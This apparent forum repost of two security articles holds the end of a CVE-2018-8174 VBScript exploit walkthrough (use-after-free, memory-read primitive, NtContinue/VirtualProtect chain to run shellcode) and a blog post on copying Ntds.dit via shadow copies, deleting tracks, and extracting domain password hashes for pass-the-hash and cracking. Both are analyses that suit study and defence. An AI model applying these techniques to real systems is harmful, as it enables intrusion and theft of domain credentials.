In the SetProp function, ReuseClass.mem is saved and the Default Property Get of class ReplacingClass_* is called; the result of that call will be placed in ReuseClass.mem. Inside that getter, UafArray is emptied by assigning 0 to each element. This causes VBScriptClass::Release to be called on the ReuseClass object that is referenced by UafArray. It turns out that at this stage of execution the ReuseClass object has a reference counter equal to 7, and since we call Release 7 times, the object gets freed. And because those references came from the use-after-free situation, they are not accounted for in the reference counter. In place of ReuseClass, a new object of FakeReuseClass is allocated. Now, to get its reference counter equal to 7, as was the case with ReuseClass, we assign it 7 times to UafArray. Here is the memory layout before and after this operation. After this is done, the getter function will return a value that will be assigned to the old ReuseClass::mem variable. As can be seen in the memory dumps, the old value was placed 0xC bytes before the new one. The objects were specially crafted to cause this situation, for example by selecting the proper length for function names. Now the value written to ReuseClass::mem will overwrite the FakeReuseClass::mem header, causing a type confusion. The last line assigned the string FakeArrayString to objectImitatingArray.mem, so the header now has the value of VT_BSTR.

Q=CDbl("174088534690791e-324") ' db 0, 0, 0, 0, 0Ch, 20h, 0, 0

This value overwrote the objectImitatingArray.mem type with VT_ARRAY | VT_VARIANT, and now the pointer to the string will be interpreted as a pointer to a SAFEARRAY structure.

Arbitrary memory read

The result is that we end up with two objects of FakeReuseClass. One of them has a mem member array that addresses the whole user space (0x00000000 - 0x7fffffff), and the other has a member of type VT_I4 (4-byte integer) holding a pointer to an empty 16-byte string. Using the second object, a pointer to the string is leaked: some_memory=resueObjectB_int.mem It will later be used as an address in memory that is writable. The next step is to leak an address inside vbscript.dll. Here a very neat trick is used. First we declare that on error, the script should just continue regular execution. Then there is an attempt to assign EmptySub to a variable. This is not possible in VBS, but a value is still pushed on the stack before the error is generated. The next instruction should assign null to a variable, which it does by simply changing the type of the last value on the stack to VT_NULL. Now emptySub_addr_placeholder holds a pointer to the function, but with the type set to VT_NULL. Then this value is written to our writable memory, its type is changed to VT_I4, and it is read back as an integer. If we check the content of this value, it turns out to be a pointer to CScriptEntryPoint, whose first member is a vftable pointing inside vbscript.dll. To read a value from an arbitrary address, in this case the pointer returned from LeakVBAddr, the following functions are used: The read is achieved by first writing address+4 to writable memory, then changing its type to VT_BSTR. Now address+4 is treated as a pointer to a BSTR. If we call LenB on address+4, it will return the value pointed to by address. Why? Because of how a BSTR is defined: the Unicode value is preceded by its byte length, and that length is what LenB returns. Now that an address inside vbscript.dll has been leaked and an arbitrary memory read has been established, it is a matter of properly traversing the PE header to obtain all the needed addresses. The details of doing that won't be explained here; this article explains the PE file format in great detail.
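To make the LenB read primitive easier to picture, here is a tiny, hedged Python model of it (a toy byte buffer stands in for process memory; this is an illustration only, not exploit code):

import struct

# Toy model of process memory. The DWORD we want to leak lives at "address";
# the exploit hands VBScript a fake BSTR whose data pointer is address + 4.
memory = bytearray(64)
address = 16
secret = 0x6C161748                      # e.g. a vftable pointer worth leaking
struct.pack_into("<I", memory, address, secret)

def lenb(bstr_ptr):
    # LenB(BSTR) returns the 32-bit byte length stored 4 bytes before the data
    return struct.unpack_from("<I", memory, bstr_ptr - 4)[0]

print(hex(lenb(address + 4)))            # 0x6c161748 - the "leaked" DWORD

The exploit does exactly this, except the buffer is the entire user space of the target process, so LenB becomes a generic 32-bit read.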
Triggering code execution

Final code execution is achieved in two steps. First a chain of two calls is built, but it's not a ROP chain: NtContinue is provided with a CONTEXT structure that sets EIP to the address of VirtualProtect, and ESP to a structure containing VirtualProtect's parameters. First the address of the shellcode is obtained using the previously described technique of changing the variable type to VT_I4 and reading the pointer. Next a structure for VirtualProtect is built that contains all the necessary parameters, like the shellcode address, its size and RWX protection. It also has space that will be used by stack operations inside VirtualProtect. After that a CONTEXT structure is built, with EIP set to VirtualProtect and ESP to its parameters. This structure also has, as its first value, a pointer to the NtContinue address repeated 4 times. The final step before starting this chain is to save the structure as a string in memory. This function is then used to start the chain: first it changes the type of the saved structure to 0x4D and then sets its value to 0, which causes VAR::Clear to be called. And here is a dynamic view from the debugger. Although it might seem complicated, this chain of execution is very simple. Just two steps: invoke NtContinue with a CONTEXT structure pointing to VirtualProtect; then VirtualProtect will disable DEP on the memory page that contains the shellcode and, after that, return into the shellcode.

Conclusion

CVE-2018–8174 is a good example of chaining a few use-after-free and type confusion conditions to achieve code execution in a very clever way. It's a great example to learn from and to understand the inner workings of such exploits.

Useful links

Commented exploit code
Kaspersky's root cause analysis
360's analysis
Another Kaspersky analysis
CVE-2014–6332 analysis by Trend Micro

Sursa: https://medium.com/@florek/dissecting-modern-browser-exploit-case-study-of-cve-2018-8174-1a6046729890
  25. Extracting Password Hashes from the Ntds.dit File March 27, 2017 Jeff Warren Comments 0 Comment AD Attack #3 – Ntds.dit Extraction With so much attention paid to detecting credential-based attacks such as Pass-the-Hash (PtH) and Pass-the-Ticket (PtT), other more serious and effective attacks are often overlooked. One such attack is focused on exfiltrating the Ntds.dit file from Active Directory Domain Controllers. Let’s take a look at what this threat entails and how it can be performed. Then we can review some mitigating controls to be sure you are protecting your own environment from such attacks. What is the Ntds.dit File? The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators. Performing an Attack on the Ntds.dit File In order to retrieve password hashes from the Ntds.dit, the first step is getting a copy of the file. This isn’t as straightforward as it sounds, as this file is constantly in use by AD and locked. If you try to simply copy the file, you will see an error message similar to: There are several ways around this using capabilities built into Windows, or with PowerShell libraries. These approaches include: Use Volume Shadow Copies via the VSSAdmin command Leverage the NTDSUtil diagnostic tool available as part of Active Directory Use the PowerSploit penetration testing PowerShell modules Leverage snapshots if your Domain Controllers are running as virtual machines In this post, I’ll quickly walk you through two of these approaches: VSSAdmin and PowerSploit’s NinjaCopy. Using VSSAdmin to Steal the Ntds.dit File Step 1 – Create a Volume Shadow Copy Step 2 – Retrieve Ntds.dit file from Volume Shadow Copy Step 3 – Copy SYSTEM file from registry or Volume Shadow Copy. This contains the Boot Key that will be needed to decrypt the Ntds.dit file later. Step 4 – Delete your tracks Using PowerSploit NinjaCopy to Steal the Ntds.dit File PowerSploit is a PowerShell penetration testing framework that contains various capabilities that can be used for exploitation of Active Directory. One module is Invoke-NinjaCopy, which copies a file from an NTFS-partitioned volume by reading the raw volume. This approach is another way to access files that are locked by Active Directory without alerting any monitoring systems. Extracting Password Hashes Regardless of which approach was used to retrieve the Ntds.dit file, the next step is to extract password information from the database. As mentioned earlier, the value of this attack is that once you have the files necessary, the rest of the attack can be performed offline to avoid detection. DSInternals provides a PowerShell module that can be used for interacting with the Ntds.dit file, including extraction of password hashes. Once you have extracted the password hashes from the Ntds.dit file, you are able to leverage tools like Mimikatz to perform pass-the-hash (PtH) attacks. Furthermore, you can use tools like Hashcat to crack these passwords and obtain their clear text values. 
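To see why offline cracking is so effective, note that the password hashes stored in Ntds.dit are unsalted NT hashes, i.e. MD4 computed over the UTF-16LE encoded password. A minimal, hedged Python sketch follows (hashlib only exposes md4 when the underlying OpenSSL build provides it, which on newer systems may require the legacy provider):

import hashlib

def nt_hash(password):
    # NT hash: MD4 over the UTF-16LE encoded password, with no salt
    return hashlib.new("md4", password.encode("utf-16le")).hexdigest()

print(nt_hash("Summer2018!"))    # every account using this password stores this exact hash

Because there is no salt, identical passwords produce identical hashes, which is why wordlist attacks with tools like Hashcat against a dumped Ntds.dit are so cheap, and why pass-the-hash works without cracking at all.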
Once you have the credentials, there are no limitations to what you can do with them. How to Protect the Ntds.dit File The best way to stay protected against this attack is to limit the number of users who can log onto Domain Controllers, including commonly protected groups such as Domain and Enterprise Admins, but also Print Operators, Server Operators, and Account Operators. These groups should be limited, monitored for changes, and frequently recertified. In addition, leveraging monitoring software to alert on and prevent users from retrieving files off Volume Shadow Copies will be beneficial to reduce the attack surface. Here are the other blogs in the series: AD Attack #1 – Performing Domain Reconnaissance (PowerShell) Read Now AD Attack #2 – Local Admin Mapping (Bloodhound) Read Now AD Attack #4 – Stealing Passwords from Memory (Mimikatz) Read Now To watch the AD Attacks webinar, please click here. Jeff Warren Jeff Warren is STEALTHbits’ Vice President of Product Management. Jeff has held multiple roles within the Product Management group since joining the organization in 2010, initially building STEALTHbits’ SharePoint management offerings before shifting focus to the organization’s Data Access Governance solution portfolio as a whole. Before joining STEALTHbits, Jeff was a Software Engineer at Wall Street Network, a solutions provider specializing in GIS software and custom SharePoint development. With deep knowledge and experience in technology, product and project management, Jeff and his teams are responsible for designing and delivering STEALTHbits’ high quality, innovative solutions. Jeff holds a Bachelor of Science degree in Information Systems from the University of Delaware. Sursa: https://blog.stealthbits.com/extracting-password-hashes-from-the-ntds-dit-file/